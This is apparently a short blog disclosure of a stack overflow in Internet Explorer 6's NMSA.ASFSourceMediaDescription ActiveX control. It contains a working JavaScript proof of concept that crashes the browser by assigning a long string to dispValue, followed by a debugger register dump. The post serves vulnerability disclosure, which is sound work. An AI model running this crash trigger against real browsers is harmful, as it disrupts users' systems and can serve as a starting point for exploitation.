The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. Setting the dispValue property of this object to a long string triggers a stack overflow (not a buffer overflow).
var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
var b = 'XXXX';
while (b.length <= 1024) b += b;
a.dispValue = b;
Demonstration
eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi
This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment